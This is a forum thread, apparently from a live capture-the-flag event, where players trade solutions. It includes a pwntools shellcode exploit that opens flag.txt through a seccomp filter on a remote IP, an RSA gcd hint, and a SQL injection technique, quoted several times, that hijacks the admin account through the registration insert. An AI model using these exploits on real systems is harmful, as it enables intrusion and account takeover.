Posts: 4 Threads: 0 Joined: N/A October 25, 2022 at 2:15 AM thanks! Posts: 3 Threads: 0 Joined: N/A October 25, 2022 at 2:34 AM Thanks Posts: 56 Threads: 0 Joined: N/A October 25, 2022 at 2:34 AM Still working on PWN. What I have so far: Output from seccomp-tools dump ./pumpking line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x09 0xc000003e if (A != ARCH_X86_64) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x06 0xffffffff if (A != 0xffffffff) goto 0011
0005: 0x15 0x04 0x00 0x00000000 if (A == read) goto 0010
0006: 0x15 0x03 0x00 0x00000001 if (A == write) goto 0010
0007: 0x15 0x02 0x00 0x0000000f if (A == rt_sigreturn) goto 0010
0008: 0x15 0x01 0x00 0x0000003c if (A == exit) goto 0010
0009: 0x15 0x00 0x01 0x00000101 if (A != openat) goto 0011
0010: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0011: 0x06 0x00 0x00 0x00000000 return KILL
I wrote this using pwntools, but it's not working: from pwn import *
context.clear(arch="amd64")
shellcode = shellcraft.linux.openat(-1, "flag.txt")
shellcode1 = shellcraft.linux.read(3, 'rsp', 80)
shellcode2 = shellcraft.linux.write(1, 'rsp', 80)
def main():
#print(asm(shellcode))
io = remote("142.93.35.129", 30658)
io.recvuntil(b"kids: ", timeout=1)
print(io.recv())
io.sendline(b"pumpk1ngRulez")
io.recvuntil(b">> ", timeout=1)
print(io.recv())
io.send(asm(shellcode + shellcode1 + shellcode2))
io.interactive()
if __name__ == "__main__":
main()
If anyone has any hints, I'd really appreciate it. Posts: 6 Threads: 0 Joined: N/A October 25, 2022 at 2:42 AM Its working Posts: 5 Threads: 0 Joined: N/A October 25, 2022 at 2:59 AM (October 24, 2022, 02:32 PM)killerbee Wrote: for crypto compute the gcd of c1 -c2 and N is p
then compute c1 - p ^e1mod N
it is indeed the flag bravo dear chap Posts: 2 Threads: 0 Joined: N/A October 25, 2022 at 3:23 AM (October 24, 2022, 09:46 PM)lnf02 Wrote: Hey guys @Hacker2222, I found the solution for this Web challenge, doesn't seem to be like a "easy" challenge, more like a medium challenge...
basically you need to work with nested queries, the register API is vulnerable, due to the fact that is using "insert" without any sanitization on the user's input, so... you need to bypass the "user already exists" check, and after that nest your real query. The thing is, you should be able to manipulate almost perfectly the password column but is useless... BUT SQL has a built-in function to UPDATE the field where there's a "duplicated" field... Maybe you are understanding what I'm talking about, maybe you are just looking for the god dam flag (script kiddie xD)
In other words:
You need to create a query that is able to bypass the "username already exist" check and after that, check for a duplicated value with the username=admin
If you really want to understand all the logic behind this SQLi, I recommend you to read this
https://www.w3schools.com/sql/sql_union.asp
https://stackoverflow.com/questions/8043908/how-do-i-force-an-insert-into-a-table-with-a-unique-key-if-its-already-in-the-t
Here's the high level SQLi You are insane❤️ Posts: 8 Threads: 0 Joined: N/A October 25, 2022 at 3:27 AM (October 24, 2022, 09:46 PM)lnf02 Wrote: Hey guys @Hacker2222, I found the solution for this Web challenge, doesn't seem to be like a "easy" challenge, more like a medium challenge...
basically you need to work with nested queries, the register API is vulnerable, due to the fact that is using "insert" without any sanitization on the user's input, so... you need to bypass the "user already exists" check, and after that nest your real query. The thing is, you should be able to manipulate almost perfectly the password column but is useless... BUT SQL has a built-in function to UPDATE the field where there's a "duplicated" field... Maybe you are understanding what I'm talking about, maybe you are just looking for the god dam flag (script kiddie xD)
In other words:
You need to create a query that is able to bypass the "username already exist" check and after that, check for a duplicated value with the username=admin
If you really want to understand all the logic behind this SQLi, I recommend you to read this
https://www.w3schools.com/sql/sql_union.asp
https://stackoverflow.com/questions/8043908/how-do-i-force-an-insert-into-a-table-with-a-unique-key-if-its-already-in-the-t
Here's the high level SQLi Great stuff. Thanks for the lesson and resources! Posts: 8 Threads: 0 Joined: N/A October 25, 2022 at 3:29 AM (October 24, 2022, 09:46 PM)lnf02 Wrote: Hey guys @Hacker2222, I found the solution for this Web challenge, doesn't seem to be like a "easy" challenge, more like a medium challenge...
basically you need to work with nested queries, the register API is vulnerable, due to the fact that is using "insert" without any sanitization on the user's input, so... you need to bypass the "user already exists" check, and after that nest your real query. The thing is, you should be able to manipulate almost perfectly the password column but is useless... BUT SQL has a built-in function to UPDATE the field where there's a "duplicated" field... Maybe you are understanding what I'm talking about, maybe you are just looking for the god dam flag (script kiddie xD)
In other words:
You need to create a query that is able to bypass the "username already exist" check and after that, check for a duplicated value with the username=admin
If you really want to understand all the logic behind this SQLi, I recommend you to read this
https://www.w3schools.com/sql/sql_union.asp
https://stackoverflow.com/questions/8043908/how-do-i-force-an-insert-into-a-table-with-a-unique-key-if-its-already-in-the-t
Here's the high level SQLi thnx Posts: 45 Threads: 0 Joined: N/A October 25, 2022 at 3:44 AM (October 24, 2022, 01:50 PM)Hacker2222 Wrote: plz discuss here
reversing challenge:
thanks @HTBContestant thanks Posts: 0 Threads: 0 Joined: N/A October 25, 2022 at 3:55 AM (October 24, 2022, 09:46 PM)lnf02 Wrote: Hey guys @Hacker2222, I found the solution for this Web challenge, doesn't seem to be like a "easy" challenge, more like a medium challenge...
basically you need to work with nested queries, the register API is vulnerable, due to the fact that is using "insert" without any sanitization on the user's input, so... you need to bypass the "user already exists" check, and after that nest your real query. The thing is, you should be able to manipulate almost perfectly the password column but is useless... BUT SQL has a built-in function to UPDATE the field where there's a "duplicated" field... Maybe you are understanding what I'm talking about, maybe you are just looking for the god dam flag (script kiddie xD)
In other words:
You need to create a query that is able to bypass the "username already exist" check and after that, check for a duplicated value with the username=admin
If you really want to understand all the logic behind this SQLi, I recommend you to read this
https://www.w3schools.com/sql/sql_union.asp
https://stackoverflow.com/questions/8043908/how-do-i-force-an-insert-into-a-table-with-a-unique-key-if-its-already-in-the-t
Here's the high level SQLi Nice Catch Buddy 😁 😉 |
